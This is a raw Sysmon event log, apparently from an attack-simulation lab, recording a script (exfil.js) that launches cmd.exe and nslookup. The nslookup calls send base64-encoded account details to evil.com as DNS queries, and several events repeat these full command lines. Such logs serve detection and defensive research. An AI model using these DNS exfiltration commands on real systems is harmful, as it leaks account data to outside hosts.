14:21:32.212{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B643-000000005F02}4816C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.212{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.212{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.212{2E1864BB-18EC-629A-B443-000000005F02}50445992C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-B643-000000005F02}4816C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.226{2E1864BB-18EC-629A-B643-000000005F02}4816C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-B443-000000005F02}5044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldpeyn.tmp 2>&1 10341000x8000000000000000209092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.181{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-B543-000000005F02}7328C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.181{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-B543-000000005F02}7328C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.181{2E1864BB-18EC-629A-B543-000000005F02}73282328C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-B443-000000005F02}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.176{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B543-000000005F02}7328C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.160{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B443-000000005F02}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.160{2E1864BB-18E0-629A-6742-000000005F02}39767576C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-B443-000000005F02}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.163{2E1864BB-18EC-629A-B443-000000005F02}5044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldpeyn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.143{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyocd.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.128{2E1864BB-18EC-629A-B243-000000005F02}28004864C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-B343-000000005F02}7200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.112{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B343-000000005F02}7200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.112{2E1864BB-18EC-629A-B143-000000005F02}6841696C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-B343-000000005F02}7200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.126{2E1864BB-18EC-629A-B343-000000005F02}7200C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-B143-000000005F02}684C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyocd.tmp 2>&1 10341000x8000000000000000209072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.097{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-B243-000000005F02}2800C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.097{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-B243-000000005F02}2800C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.097{2E1864BB-18EC-629A-B243-000000005F02}28004864C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-B143-000000005F02}684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B243-000000005F02}2800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 